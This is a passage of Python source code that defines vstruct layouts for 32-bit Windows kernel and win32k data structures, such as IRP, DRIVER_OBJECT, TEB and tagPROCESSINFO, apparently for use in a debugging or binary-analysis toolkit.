self.W32Pid = v_uint32()
self.GDIHandleCount = v_uint32()
self.GDIHandleCountPeak = v_uint32()
self.UserHandleCount = v_uint32()
self.UserHandleCountPeak = v_uint32()
self.GDIPushLock = EX_PUSH_LOCK()
self.GDIEngUserMemAllocTable = RTL_AVL_TABLE()
self.GDIDcAttrFreeList = LIST_ENTRY()
self.GDIBrushAttrFreeList = LIST_ENTRY()
self.GDIW32PIDLockedBitmaps = LIST_ENTRY()
self.hSecureGdiSharedHandleTable = v_ptr32()
self.DxProcess = v_ptr32()
class tagKBDFILE(vstruct.VStruct):
def __init__(self):
vstruct.VStruct.__init__(self)
self.head = HEAD()
self.pkfNext = v_ptr32()
self.hBase = v_ptr32()
self.pKbdTbl = v_ptr32()
self.Size = v_uint32()
self.pKbdNlsTbl = v_ptr32()
self.awchDllName = vstruct.VArray([ v_uint16() for i in xrange(32) ])
class DMM_COMMITVIDPNREQUEST_SERIALIZATION(vstruct.VStruct):
def __init__(self):
vstruct.VStruct.__init__(self)
self.AffectedVidPnSourceId = v_uint32()
self.RequestDiagInfo = DMM_COMMITVIDPNREQUEST_DIAGINFO()
self.VidPnSerialization = DMM_VIDPN_SERIALIZATION()
class EXCEPTION_REGISTRATION_RECORD(vstruct.VStruct):
def __init__(self):
vstruct.VStruct.__init__(self)
self.Next = v_ptr32()
self.Handler = v_ptr32()
class FILE_BASIC_INFORMATION(vstruct.VStruct):
def __init__(self):
vstruct.VStruct.__init__(self)
self.CreationTime = LARGE_INTEGER()
self.LastAccessTime = LARGE_INTEGER()
self.LastWriteTime = LARGE_INTEGER()
self.ChangeTime = LARGE_INTEGER()
self.FileAttributes = v_uint32()
self._pad0028 = v_bytes(size=4)
class _unnamed_12887(vstruct.VStruct):
def __init__(self):
vstruct.VStruct.__init__(self)
self.AllocatedResources = v_ptr32()
self.AllocatedResourcesTranslated = v_ptr32()
class LIST_ENTRY(vstruct.VStruct):
def __init__(self):
vstruct.VStruct.__init__(self)
self.Flink = v_ptr32()
self.Blink = v_ptr32()
class tagUSERSTARTUPINFO(vstruct.VStruct):
def __init__(self):
vstruct.VStruct.__init__(self)
self.cb = v_uint32()
self.dwX = v_uint32()
self.dwY = v_uint32()
self.dwXSize = v_uint32()
self.dwYSize = v_uint32()
self.dwFlags = v_uint32()
self.wShowWindow = v_uint16()
self.cbReserved2 = v_uint16()
class tagHID_PAGEONLY_REQUEST(vstruct.VStruct):
def __init__(self):
vstruct.VStruct.__init__(self)
self.link = LIST_ENTRY()
self.usUsagePage = v_uint16()
self._pad000c = v_bytes(size=2)
self.cRefCount = v_uint32()
class RTL_DYNAMIC_HASH_TABLE_ENUMERATOR(vstruct.VStruct):
def __init__(self):
vstruct.VStruct.__init__(self)
self.HashEntry = RTL_DYNAMIC_HASH_TABLE_ENTRY()
self.ChainHead = v_ptr32()
self.BucketIndex = v_uint32()
class tagWINDOWSTATION(vstruct.VStruct):
def __init__(self):
vstruct.VStruct.__init__(self)
self.dwSessionId = v_uint32()
self.rpwinstaNext = v_ptr32()
self.rpdeskList = v_ptr32()
self.pTerm = v_ptr32()
self.dwWSF_Flags = v_uint32()
self.spklList = v_ptr32()
self.ptiClipLock = v_ptr32()
self.ptiDrawingClipboard = v_ptr32()
self.spwndClipOpen = v_ptr32()
self.spwndClipViewer = v_ptr32()
self.spwndClipOwner = v_ptr32()
self.pClipBase = v_ptr32()
self.cNumClipFormats = v_uint32()
self.iClipSerialNumber = v_uint32()
self.iClipSequenceNumber = v_uint32()
self.spwndClipboardListener = v_ptr32()
self.pGlobalAtomTable = v_ptr32()
self.luidEndSession = LUID()
self.luidUser = LUID()
self.psidUser = v_ptr32()
class _unnamed_16049(vstruct.VStruct):
def __init__(self):
vstruct.VStruct.__init__(self)
self.Port = _unnamed_16581()
class DMM_VIDPNPATHSFROMSOURCE_SERIALIZATION(vstruct.VStruct):
def __init__(self):
vstruct.VStruct.__init__(self)
self.SourceMode = D3DKMDT_VIDPN_SOURCE_MODE()
self.NumPathsFromSource = v_uint8()
self._pad002c = v_bytes(size=3)
self.PathAndTargetModeSerialization = vstruct.VArray([ DMM_VIDPNPATHANDTARGETMODE_SERIALIZATION() for i in xrange(1) ])
class GUID(vstruct.VStruct):
def __init__(self):
vstruct.VStruct.__init__(self)
self.Data1 = v_uint32()
self.Data2 = v_uint16()
self.Data3 = v_uint16()
self.Data4 = vstruct.VArray([ v_uint8() for i in xrange(8) ])
class D3DKMDT_GRAPHICS_RENDERING_FORMAT(vstruct.VStruct):
def __init__(self):
vstruct.VStruct.__init__(self)
self.PrimSurfSize = D3DKMDT_2DREGION()
self.VisibleRegionSize = D3DKMDT_2DREGION()
self.Stride = v_uint32()
self.PixelFormat = v_uint32()
self.ColorBasis = v_uint32()
self.PixelValueAccessMode = v_uint32()
class GENERIC_MAPPING(vstruct.VStruct):
def __init__(self):
vstruct.VStruct.__init__(self)
self.GenericRead = v_uint32()
self.GenericWrite = v_uint32()
self.GenericExecute = v_uint32()
self.GenericAll = v_uint32()
class IRP(vstruct.VStruct):
def __init__(self):
vstruct.VStruct.__init__(self)
self.Type = v_uint16()
self.Size = v_uint16()
self.MdlAddress = v_ptr32()
self.Flags = v_uint32()
self.AssociatedIrp = _unnamed_12389()
self.ThreadListEntry = LIST_ENTRY()
self.IoStatus = IO_STATUS_BLOCK()
self.RequestorMode = v_uint8()
self.PendingReturned = v_uint8()
self.StackCount = v_uint8()
self.CurrentLocation = v_uint8()
self.Cancel = v_uint8()
self.CancelIrql = v_uint8()
self.ApcEnvironment = v_uint8()
self.AllocationFlags = v_uint8()
self.UserIosb = v_ptr32()
self.UserEvent = v_ptr32()
self.Overlay = _unnamed_12392()
self.CancelRoutine = v_ptr32()
self.UserBuffer = v_ptr32()
self.Tail = _unnamed_12395()
class _unnamed_11700(vstruct.VStruct):
def __init__(self):
vstruct.VStruct.__init__(self)
self.LowPart = v_uint32()
self.HighPart = v_uint32()
class DRIVER_OBJECT(vstruct.VStruct):
def __init__(self):
vstruct.VStruct.__init__(self)
self.Type = v_uint16()
self.Size = v_uint16()
self.DeviceObject = v_ptr32()
self.Flags = v_uint32()
self.DriverStart = v_ptr32()
self.DriverSize = v_uint32()
self.DriverSection = v_ptr32()
self.DriverExtension = v_ptr32()
self.DriverName = UNICODE_STRING()
self.HardwareDatabase = v_ptr32()
self.FastIoDispatch = v_ptr32()
self.DriverInit = v_ptr32()
self.DriverStartIo = v_ptr32()
self.DriverUnload = v_ptr32()
self.MajorFunction = vstruct.VArray([ v_ptr32() for i in xrange(28) ])
class MAILSLOT_CREATE_PARAMETERS(vstruct.VStruct):
def __init__(self):
vstruct.VStruct.__init__(self)
self.MailslotQuota = v_uint32()
self.MaximumMessageSize = v_uint32()
self.ReadTimeout = LARGE_INTEGER()
self.TimeoutSpecified = v_uint8()
self._pad0018 = v_bytes(size=7)
class DMM_VIDPN_SERIALIZATION(vstruct.VStruct):
def __init__(self):
vstruct.VStruct.__init__(self)
self.Size = v_uint32()
self.NumActiveSources = v_uint8()
self._pad0008 = v_bytes(size=3)
self.PathsFromSourceSerializationOffsets = vstruct.VArray([ v_uint32() for i in xrange(1) ])
class _unnamed_16606(vstruct.VStruct):
def __init__(self):
vstruct.VStruct.__init__(self)
self.Priority = v_uint32()
self.Reserved1 = v_uint32()
self.Reserved2 = v_uint32()
class _unnamed_16601(vstruct.VStruct):
def __init__(self):
vstruct.VStruct.__init__(self)
self.Length = v_uint32()
self.MinBusNumber = v_uint32()
self.MaxBusNumber = v_uint32()
self.Reserved = v_uint32()
class IO_COMPLETION_CONTEXT(vstruct.VStruct):
def __init__(self):
vstruct.VStruct.__init__(self)
self.Port = v_ptr32()
self.Key = v_ptr32()
class DRIVER_EXTENSION(vstruct.VStruct):
def __init__(self):
vstruct.VStruct.__init__(self)
self.DriverObject = v_ptr32()
self.AddDevice = v_ptr32()
self.Count = v_uint32()
self.ServiceKeyName = UNICODE_STRING()
class _unnamed_16084(vstruct.VStruct):
def __init__(self):
vstruct.VStruct.__init__(self)
self.Data = vstruct.VArray([ v_uint32() for i in xrange(3) ])
class DMM_COFUNCPATHSMODALITY_SERIALIZATION(vstruct.VStruct):
def __init__(self):
vstruct.VStruct.__init__(self)
self.NumPathsFromSource = v_uint8()
self._pad0004 = v_bytes(size=3)
self.PathAndTargetModeSetOffset = vstruct.VArray([ v_uint32() for i in xrange(1) ])
class tagTDB(vstruct.VStruct):
def __init__(self):
vstruct.VStruct.__init__(self)
self.ptdbNext = v_ptr32()
self.nEvents = v_uint32()
self.nPriority = v_uint32()
self.pti = v_ptr32()
self.pwti = v_ptr32()
self.hTaskWow = v_uint16()
self.TDB_Flags = v_uint16()
class WHEA_PERSISTENCE_INFO(vstruct.VStruct):
def __init__(self):
vstruct.VStruct.__init__(self)
self.Signature = v_uint64()
class WHEA_ERROR_RECORD_SECTION_DESCRIPTOR_VALIDBITS(vstruct.VStruct):
def __init__(self):
vstruct.VStruct.__init__(self)
self.FRUId = v_uint8()
class tagWin32AllocStats(vstruct.VStruct):
def __init__(self):
vstruct.VStruct.__init__(self)
self.dwMaxMem = v_uint32()
self.dwCrtMem = v_uint32()
self.dwMaxAlloc = v_uint32()
self.dwCrtAlloc = v_uint32()
self.pHead = v_ptr32()
class GENERAL_LOOKASIDE_POOL(vstruct.VStruct):
def __init__(self):
vstruct.VStruct.__init__(self)
self.ListHead = SLIST_HEADER()
self.Depth = v_uint16()
self.MaximumDepth = v_uint16()
self.TotalAllocates = v_uint32()
self.AllocateMisses = v_uint32()
self.TotalFrees = v_uint32()
self.FreeMisses = v_uint32()
self.Type = v_uint32()
self.Tag = v_uint32()
self.Size = v_uint32()
self.AllocateEx = v_ptr32()
self.FreeEx = v_ptr32()
self.ListEntry = LIST_ENTRY()
self.LastTotalAllocates = v_uint32()
self.LastAllocateMisses = v_uint32()
self.Future = vstruct.VArray([ v_uint32() for i in xrange(2) ])
class EXCEPTION_RECORD(vstruct.VStruct):
def __init__(self):
vstruct.VStruct.__init__(self)
self.ExceptionCode = v_uint32()
self.ExceptionFlags = v_uint32()
self.ExceptionRecord = v_ptr32()
self.ExceptionAddress = v_ptr32()
self.NumberParameters = v_uint32()
self.ExceptionInformation = vstruct.VArray([ v_uint32() for i in xrange(15) ])
class HTOUCHINPUT(vstruct.VStruct):
def __init__(self):
vstruct.VStruct.__init__(self)
self.unused = v_uint32()
class PROCESSOR_NUMBER(vstruct.VStruct):
def __init__(self):
vstruct.VStruct.__init__(self)
self.Group = v_uint16()
self.Number = v_uint8()
self.Reserved = v_uint8()
class IMAGE_FILE_HEADER(vstruct.VStruct):
def __init__(self):
vstruct.VStruct.__init__(self)
self.Machine = v_uint16()
self.NumberOfSections = v_uint16()
self.TimeDateStamp = v_uint32()
self.PointerToSymbolTable = v_uint32()
self.NumberOfSymbols = v_uint32()
self.SizeOfOptionalHeader = v_uint16()
self.Characteristics = v_uint16()
class tagPROCESSINFO(vstruct.VStruct):
def __init__(self):
vstruct.VStruct.__init__(self)
self.Process = v_ptr32()
self.RefCount = v_uint32()
self.W32PF_Flags = v_uint32()
self.InputIdleEvent = v_ptr32()
self.StartCursorHideTime = v_uint32()
self.NextStart = v_ptr32()
self.pDCAttrList = v_ptr32()
self.pBrushAttrList = v_ptr32()
self.W32Pid = v_uint32()
self.GDIHandleCount = v_uint32()
self.GDIHandleCountPeak = v_uint32()
self.UserHandleCount = v_uint32()
self.UserHandleCountPeak = v_uint32()
self.GDIPushLock = EX_PUSH_LOCK()
self.GDIEngUserMemAllocTable = RTL_AVL_TABLE()
self.GDIDcAttrFreeList = LIST_ENTRY()
self.GDIBrushAttrFreeList = LIST_ENTRY()
self.GDIW32PIDLockedBitmaps = LIST_ENTRY()
self.hSecureGdiSharedHandleTable = v_ptr32()
self.DxProcess = v_ptr32()
self.ptiList = v_ptr32()
self.ptiMainThread = v_ptr32()
self.rpdeskStartup = v_ptr32()
self.pclsPrivateList = v_ptr32()
self.pclsPublicList = v_ptr32()
self.pwpi = v_ptr32()
self.ppiNext = v_ptr32()
self.ppiNextRunning = v_ptr32()
self.cThreads = v_uint32()
self.hdeskStartup = v_ptr32()
self.cSysExpunge = v_uint32()
self.dwhmodLibLoadedMask = v_uint32()
self.ahmodLibLoaded = vstruct.VArray([ v_ptr32() for i in xrange(32) ])
self.rpwinsta = v_ptr32()
self.hwinsta = v_ptr32()
self.amwinsta = v_uint32()
self.dwHotkey = v_uint32()
self.hMonitor = v_ptr32()
self.pdvList = v_ptr32()
self.iClipSerialNumber = v_uint32()
self.bmHandleFlags = RTL_BITMAP()
self.pCursorCache = v_ptr32()
self.pClientBase = v_ptr32()
self.dwLpkEntryPoints = v_uint32()
self.pW32Job = v_ptr32()
self.dwImeCompatFlags = v_uint32()
self.luidSession = LUID()
self.usi = tagUSERSTARTUPINFO()
self.Flags = v_uint32()
self.dwLayout = v_uint32()
self.pHidTable = v_ptr32()
self.dwRegisteredClasses = v_uint32()
self.pvwplWndGCList = v_ptr32()
class HKL(vstruct.VStruct):
def __init__(self):
vstruct.VStruct.__init__(self)
self.unused = v_uint32()
class FLOATING_SAVE_AREA(vstruct.VStruct):
def __init__(self):
vstruct.VStruct.__init__(self)
self.ControlWord = v_uint32()
self.StatusWord = v_uint32()
self.TagWord = v_uint32()
self.ErrorOffset = v_uint32()
self.ErrorSelector = v_uint32()
self.DataOffset = v_uint32()
self.DataSelector = v_uint32()
self.RegisterArea = vstruct.VArray([ v_uint8() for i in xrange(80) ])
self.Cr0NpxState = v_uint32()
class PEB_LDR_DATA(vstruct.VStruct):
def __init__(self):
vstruct.VStruct.__init__(self)
self.Length = v_uint32()
self.Initialized = v_uint8()
self._pad0008 = v_bytes(size=3)
self.SsHandle = v_ptr32()
self.InLoadOrderModuleList = LIST_ENTRY()
self.InMemoryOrderModuleList = LIST_ENTRY()
self.InInitializationOrderModuleList = LIST_ENTRY()
self.EntryInProgress = v_ptr32()
self.ShutdownInProgress = v_uint8()
self._pad002c = v_bytes(size=3)
self.ShutdownThreadId = v_ptr32()
class _unnamed_12724(vstruct.VStruct):
def __init__(self):
vstruct.VStruct.__init__(self)
self.Srb = v_ptr32()
class _unnamed_12720(vstruct.VStruct):
def __init__(self):
vstruct.VStruct.__init__(self)
self.Vpb = v_ptr32()
self.DeviceObject = v_ptr32()
class DMM_MONITORFREQUENCYRANGESET_SERIALIZATION(vstruct.VStruct):
def __init__(self):
vstruct.VStruct.__init__(self)
self.NumFrequencyRanges = v_uint8()
self._pad0004 = v_bytes(size=3)
self.FrequencyRangeSerialization = vstruct.VArray([ D3DKMDT_MONITOR_FREQUENCY_RANGE() for i in xrange(1) ])
class SECURITY_SUBJECT_CONTEXT(vstruct.VStruct):
def __init__(self):
vstruct.VStruct.__init__(self)
self.ClientToken = v_ptr32()
self.ImpersonationLevel = v_uint32()
self.PrimaryToken = v_ptr32()
self.ProcessAuditId = v_ptr32()
class DMM_MONITOR_SERIALIZATION(vstruct.VStruct):
def __init__(self):
vstruct.VStruct.__init__(self)
self.Size = v_uint32()
self.VideoPresentTargetId = v_uint32()
self.Orientation = v_uint32()
self.IsSimulatedMonitor = v_uint8()
self.IsUsingDefaultProfile = v_uint8()
self._pad0010 = v_bytes(size=2)
self.ModePruningAlgorithm = v_uint32()
self.MonitorPowerState = v_uint32()
self.SourceModeSetOffset = v_uint32()
self.FrequencyRangeSetOffset = v_uint32()
self.DescriptorSetOffset = v_uint32()
self.MonitorType = v_uint32()
class tagKbdLayer(vstruct.VStruct):
def __init__(self):
vstruct.VStruct.__init__(self)
self.pCharModifiers = v_ptr32()
self.pVkToWcharTable = v_ptr32()
self.pDeadKey = v_ptr32()
self.pKeyNames = v_ptr32()
self.pKeyNamesExt = v_ptr32()
self.pKeyNamesDead = v_ptr32()
self.pusVSCtoVK = v_ptr32()
self.bMaxVSCtoVK = v_uint8()
self._pad0020 = v_bytes(size=3)
self.pVSCtoVK_E0 = v_ptr32()
self.pVSCtoVK_E1 = v_ptr32()
self.fLocaleFlags = v_uint32()
self.nLgMax = v_uint8()
self.cbLgEntry = v_uint8()
self._pad0030 = v_bytes(size=2)
self.pLigature = v_ptr32()
self.dwType = v_uint32()
self.dwSubType = v_uint32()
class _unnamed_11687(vstruct.VStruct):
def __init__(self):
vstruct.VStruct.__init__(self)
self.LowPart = v_uint32()
self.HighPart = v_uint32()
class tagMSG(vstruct.VStruct):
def __init__(self):
vstruct.VStruct.__init__(self)
self.hwnd = v_ptr32()
self.message = v_uint32()
self.wParam = v_uint32()
self.lParam = v_uint32()
self.time = v_uint32()
self.pt = tagPOINT()
class HWND(vstruct.VStruct):
def __init__(self):
vstruct.VStruct.__init__(self)
self.unused = v_uint32()
class INTERFACE(vstruct.VStruct):
def __init__(self):
vstruct.VStruct.__init__(self)
self.Size = v_uint16()
self.Version = v_uint16()
self.Context = v_ptr32()
self.InterfaceReference = v_ptr32()
self.InterfaceDereference = v_ptr32()
class SLIST_HEADER(vstruct.VStruct):
def __init__(self):
vstruct.VStruct.__init__(self)
self.Alignment = v_uint64()
class FILE_STANDARD_INFORMATION(vstruct.VStruct):
def __init__(self):
vstruct.VStruct.__init__(self)
self.AllocationSize = LARGE_INTEGER()
self.EndOfFile = LARGE_INTEGER()
self.NumberOfLinks = v_uint32()
self.DeletePending = v_uint8()
self.Directory = v_uint8()
self._pad0018 = v_bytes(size=2)
class _unnamed_13037(vstruct.VStruct):
def __init__(self):
vstruct.VStruct.__init__(self)
self.InitialPrivilegeSet = INITIAL_PRIVILEGE_SET()
class IMAGE_DATA_DIRECTORY(vstruct.VStruct):
def __init__(self):
vstruct.VStruct.__init__(self)
self.VirtualAddress = v_uint32()
self.Size = v_uint32()
class FILE_OBJECT(vstruct.VStruct):
def __init__(self):
vstruct.VStruct.__init__(self)
self.Type = v_uint16()
self.Size = v_uint16()
self.DeviceObject = v_ptr32()
self.Vpb = v_ptr32()
self.FsContext = v_ptr32()
self.FsContext2 = v_ptr32()
self.SectionObjectPointer = v_ptr32()
self.PrivateCacheMap = v_ptr32()
self.FinalStatus = v_uint32()
self.RelatedFileObject = v_ptr32()
self.LockOperation = v_uint8()
self.DeletePending = v_uint8()
self.ReadAccess = v_uint8()
self.WriteAccess = v_uint8()
self.DeleteAccess = v_uint8()
self.SharedRead = v_uint8()
self.SharedWrite = v_uint8()
self.SharedDelete = v_uint8()
self.Flags = v_uint32()
self.FileName = UNICODE_STRING()
self.CurrentByteOffset = LARGE_INTEGER()
self.Waiters = v_uint32()
self.Busy = v_uint32()
self.LastLock = v_ptr32()
self.Lock = KEVENT()
self.Event = KEVENT()
self.CompletionContext = v_ptr32()
self.IrpListLock = v_uint32()
self.IrpList = LIST_ENTRY()
self.FileObjectExtension = v_ptr32()
class tagWOWPROCESSINFO(vstruct.VStruct):
def __init__(self):
vstruct.VStruct.__init__(self)
self.pwpiNext = v_ptr32()
self.ptiScheduled = v_ptr32()
self.ptdbHead = v_ptr32()
self.lpfnWowExitTask = v_ptr32()
self.pEventWowExec = v_ptr32()
self.hEventWowExecClient = v_ptr32()
self.nSendLock = v_uint32()
self.nRecvLock = v_uint32()
self.CSOwningThread = v_ptr32()
self.CSLockCount = v_uint32()
class tagMENU(vstruct.VStruct):
def __init__(self):
vstruct.VStruct.__init__(self)
self.head = PROCDESKHEAD()
self.fFlags = v_uint32()
self.iItem = v_uint32()
self.cAlloced = v_uint32()
self.cItems = v_uint32()
self.cxMenu = v_uint32()
self.cyMenu = v_uint32()
self.cxTextAlign = v_uint32()
self.spwndNotify = v_ptr32()
self.rgItems = v_ptr32()
self.pParentMenus = v_ptr32()
self.dwContextHelpId = v_uint32()
self.cyMax = v_uint32()
self.dwMenuData = v_uint32()
self.hbrBack = v_ptr32()
self.iTop = v_uint32()
self.iMaxTop = v_uint32()
self.dwArrowsOn = v_uint32()
self.umpm = tagUAHMENUPOPUPMETRICS()
class ERESOURCE(vstruct.VStruct):
def __init__(self):
vstruct.VStruct.__init__(self)
self.SystemResourcesList = LIST_ENTRY()
self.OwnerTable = v_ptr32()
self.ActiveCount = v_uint16()
self.Flag = v_uint16()
self.SharedWaiters = v_ptr32()
self.ExclusiveWaiters = v_ptr32()
self.OwnerEntry = OWNER_ENTRY()
self.ActiveEntries = v_uint32()
self.ContentionCount = v_uint32()
self.NumberOfSharedWaiters = v_uint32()
self.NumberOfExclusiveWaiters = v_uint32()
self.Address = v_ptr32()
self.SpinLock = v_uint32()
class ACCESS_REASONS(vstruct.VStruct):
def __init__(self):
vstruct.VStruct.__init__(self)
self.Data = vstruct.VArray([ v_uint32() for i in xrange(32) ])
class THRDESKHEAD(vstruct.VStruct):
def __init__(self):
vstruct.VStruct.__init__(self)
self.h = v_ptr32()
self.cLockObj = v_uint32()
self.pti = v_ptr32()
self.rpdesk = v_ptr32()
self.pSelf = v_ptr32()
class _unnamed_16090(vstruct.VStruct):
def __init__(self):
vstruct.VStruct.__init__(self)
self.DataSize = v_uint32()
self.Reserved1 = v_uint32()
self.Reserved2 = v_uint32()
class tagPOPUPMENU(vstruct.VStruct):
def __init__(self):
vstruct.VStruct.__init__(self)
self.fIsMenuBar = v_uint32()
self.spwndNotify = v_ptr32()
self.spwndPopupMenu = v_ptr32()
self.spwndNextPopup = v_ptr32()
self.spwndPrevPopup = v_ptr32()
self.spmenu = v_ptr32()
self.spmenuAlternate = v_ptr32()
self.spwndActivePopup = v_ptr32()
self.ppopupmenuRoot = v_ptr32()
self.ppmDelayedFree = v_ptr32()
self.posSelectedItem = v_uint32()
self.posDropped = v_uint32()
class TP_TASK_CALLBACKS(vstruct.VStruct):
def __init__(self):
vstruct.VStruct.__init__(self)
self.ExecuteCallback = v_ptr32()
self.Unposted = v_ptr32()
class _unnamed_16097(vstruct.VStruct):
def __init__(self):
vstruct.VStruct.__init__(self)
self.Start = LARGE_INTEGER()
self.Length48 = v_uint32()
class _unnamed_16094(vstruct.VStruct):
def __init__(self):
vstruct.VStruct.__init__(self)
self.Start = LARGE_INTEGER()
self.Length40 = v_uint32()
class RTL_BALANCED_LINKS(vstruct.VStruct):
def __init__(self):
vstruct.VStruct.__init__(self)
self.Parent = v_ptr32()
self.LeftChild = v_ptr32()
self.RightChild = v_ptr32()
self.Balance = v_uint8()
self.Reserved = vstruct.VArray([ v_uint8() for i in xrange(3) ])
class HANDLEENTRY(vstruct.VStruct):
def __init__(self):
vstruct.VStruct.__init__(self)
self.phead = v_ptr32()
self.pOwner = v_ptr32()
self.bType = v_uint8()
self.bFlags = v_uint8()
self.wUniq = v_uint16()
class VK_FUNCTION_PARAM(vstruct.VStruct):
def __init__(self):
vstruct.VStruct.__init__(self)
self.NLSFEProcIndex = v_uint8()
self._pad0004 = v_bytes(size=3)
self.NLSFEProcParam = v_uint32()
class EX_PUSH_LOCK(vstruct.VStruct):
def __init__(self):
vstruct.VStruct.__init__(self)
self.Locked = v_uint32()
class D3DMATRIX(vstruct.VStruct):
def __init__(self):
vstruct.VStruct.__init__(self)
self._11 = v_uint32()
self._12 = v_uint32()
self._13 = v_uint32()
self._14 = v_uint32()
self._21 = v_uint32()
self._22 = v_uint32()
self._23 = v_uint32()
self._24 = v_uint32()
self._31 = v_uint32()
self._32 = v_uint32()
self._33 = v_uint32()
self._34 = v_uint32()
self._41 = v_uint32()
self._42 = v_uint32()
self._43 = v_uint32()
self._44 = v_uint32()
class _unnamed_13453(vstruct.VStruct):
def __init__(self):
vstruct.VStruct.__init__(self)
self.ActiveSize = D3DKMDT_2DREGION()
class CONSOLE_CARET_INFO(vstruct.VStruct):
def __init__(self):
vstruct.VStruct.__init__(self)
self.hwnd = v_ptr32()
self.rc = tagRECT()
class D3DKMDT_VIDPN_PRESENT_PATH_ROTATION_SUPPORT(vstruct.VStruct):
def __init__(self):
vstruct.VStruct.__init__(self)
self.Identity = v_uint32()
class WHEA_ERROR_RECORD_HEADER(vstruct.VStruct):
def __init__(self):
vstruct.VStruct.__init__(self)
self.Signature = v_uint32()
self.Revision = WHEA_REVISION()
self.SignatureEnd = v_uint32()
self.SectionCount = v_uint16()
self.Severity = v_uint32()
self.ValidBits = WHEA_ERROR_RECORD_HEADER_VALIDBITS()
self.Length = v_uint32()
self.Timestamp = WHEA_TIMESTAMP()
self.PlatformId = GUID()
self.PartitionId = GUID()
self.CreatorId = GUID()
self.NotifyType = GUID()
self.RecordId = v_uint64()
self.Flags = WHEA_ERROR_RECORD_HEADER_FLAGS()
self.PersistenceInfo = WHEA_PERSISTENCE_INFO()
self.Reserved = vstruct.VArray([ v_uint8() for i in xrange(12) ])
class EVENT_DESCRIPTOR(vstruct.VStruct):
def __init__(self):
vstruct.VStruct.__init__(self)
self.Id = v_uint16()
self.Version = v_uint8()
self.Channel = v_uint8()
self.Level = v_uint8()
self.Opcode = v_uint8()
self.Task = v_uint16()
self.Keyword = v_uint64()
class tagSBCALC(vstruct.VStruct):
def __init__(self):
vstruct.VStruct.__init__(self)
self.posMin = v_uint32()
self.posMax = v_uint32()
self.page = v_uint32()
self.pos = v_uint32()
self.pxTop = v_uint32()
self.pxBottom = v_uint32()
self.pxLeft = v_uint32()
self.pxRight = v_uint32()
self.cpxThumb = v_uint32()
self.pxUpArrow = v_uint32()
self.pxDownArrow = v_uint32()
self.pxStart = v_uint32()
self.pxThumbBottom = v_uint32()
self.pxThumbTop = v_uint32()
self.cpx = v_uint32()
self.pxMin = v_uint32()
class _unnamed_12451(vstruct.VStruct):
def __init__(self):
vstruct.VStruct.__init__(self)
self.ListEntry = LIST_ENTRY()
self._pad0028 = v_bytes(size=32)
class tagSBINFO(vstruct.VStruct):
def __init__(self):
vstruct.VStruct.__init__(self)
self.WSBflags = v_uint32()
self.Horz = tagSBDATA()
self.Vert = tagSBDATA()
class FLS_CALLBACK_INFO(vstruct.VStruct):
def __init__(self):
vstruct.VStruct.__init__(self)
class _unnamed_11733(vstruct.VStruct):
def __init__(self):
vstruct.VStruct.__init__(self)
self.LongFunction = v_uint32()
class _unnamed_11730(vstruct.VStruct):
def __init__(self):
vstruct.VStruct.__init__(self)
self.Flags = v_uint32()
class LIST_ENTRY64(vstruct.VStruct):
def __init__(self):
vstruct.VStruct.__init__(self)
self.Flink = v_uint64()
self.Blink = v_uint64()
class tagOEMBITMAPINFO(vstruct.VStruct):
def __init__(self):
vstruct.VStruct.__init__(self)
self.x = v_uint32()
self.y = v_uint32()
self.cx = v_uint32()
self.cy = v_uint32()
class WAIT_CONTEXT_BLOCK(vstruct.VStruct):
def __init__(self):
vstruct.VStruct.__init__(self)
self.WaitQueueEntry = KDEVICE_QUEUE_ENTRY()
self.DeviceRoutine = v_ptr32()
self.DeviceContext = v_ptr32()
self.NumberOfMapRegisters = v_uint32()
self.DeviceObject = v_ptr32()
self.CurrentIrp = v_ptr32()
self.BufferChainingDpc = v_ptr32()
class _unnamed_16072(vstruct.VStruct):
def __init__(self):
vstruct.VStruct.__init__(self)
self.Group = v_uint16()
self.MessageCount = v_uint16()
self.Vector = v_uint32()
self.Affinity = v_uint32()
class ACTIVATION_CONTEXT_STACK(vstruct.VStruct):
def __init__(self):
vstruct.VStruct.__init__(self)
self.ActiveFrame = v_ptr32()
self.FrameListCache = LIST_ENTRY()
self.Flags = v_uint32()
self.NextCookieSequenceNumber = v_uint32()
self.StackId = v_uint32()
class tagITEM(vstruct.VStruct):
def __init__(self):
vstruct.VStruct.__init__(self)
self.fType = v_uint32()
self.fState = v_uint32()
self.wID = v_uint32()
self.spSubMenu = v_ptr32()
self.hbmpChecked = v_ptr32()
self.hbmpUnchecked = v_ptr32()
self.lpstr = v_ptr32()
self.cch = v_uint32()
self.dwItemData = v_uint32()
self.xItem = v_uint32()
self.yItem = v_uint32()
self.cxItem = v_uint32()
self.cyItem = v_uint32()
self.dxTab = v_uint32()
self.ulX = v_uint32()
self.ulWidth = v_uint32()
self.hbmp = v_ptr32()
self.cxBmp = v_uint32()
self.cyBmp = v_uint32()
self.umim = tagUAHMENUITEMMETRICS()
class LOOKASIDE_LIST_EX(vstruct.VStruct):
def __init__(self):
vstruct.VStruct.__init__(self)
self.L = GENERAL_LOOKASIDE_POOL()
class TEB(vstruct.VStruct):
def __init__(self):
vstruct.VStruct.__init__(self)
self.NtTib = NT_TIB()
self.EnvironmentPointer = v_ptr32()
self.ClientId = CLIENT_ID()
self.ActiveRpcHandle = v_ptr32()
self.ThreadLocalStoragePointer = v_ptr32()
self.ProcessEnvironmentBlock = v_ptr32()
self.LastErrorValue = v_uint32()
self.CountOfOwnedCriticalSections = v_uint32()
self.CsrClientThread = v_ptr32()
self.Win32ThreadInfo = v_ptr32()
self.User32Reserved = vstruct.VArray([ v_uint32() for i in xrange(26) ])
self.UserReserved = vstruct.VArray([ v_uint32() for i in xrange(5) ])
self.WOW32Reserved = v_ptr32()
self.CurrentLocale = v_uint32()
self.FpSoftwareStatusRegister = v_uint32()
self.SystemReserved1 = vstruct.VArray([ v_ptr32() for i in xrange(54) ])
self.ExceptionCode = v_uint32()
self.ActivationContextStackPointer = v_ptr32()
self.SpareBytes = vstruct.VArray([ v_uint8() for i in xrange(36) ])
self.TxFsContext = v_uint32()
self.GdiTebBatch = GDI_TEB_BATCH()
self.RealClientId = CLIENT_ID()
self.GdiCachedProcessHandle = v_ptr32()
self.GdiClientPID = v_uint32()
self.GdiClientTID = v_uint32()
self.GdiThreadLocalInfo = v_ptr32()
self.Win32ClientInfo = vstruct.VArray([ v_uint32() for i in xrange(62) ])
self.glDispatchTable = vstruct.VArray([ v_ptr32() for i in xrange(233) ])
self.glReserved1 = vstruct.VArray([ v_uint32() for i in xrange(29) ])
self.glReserved2 = v_ptr32()
self.glSectionInfo = v_ptr32()
self.glSection = v_ptr32()
self.glTable = v_ptr32()
self.glCurrentRC = v_ptr32()
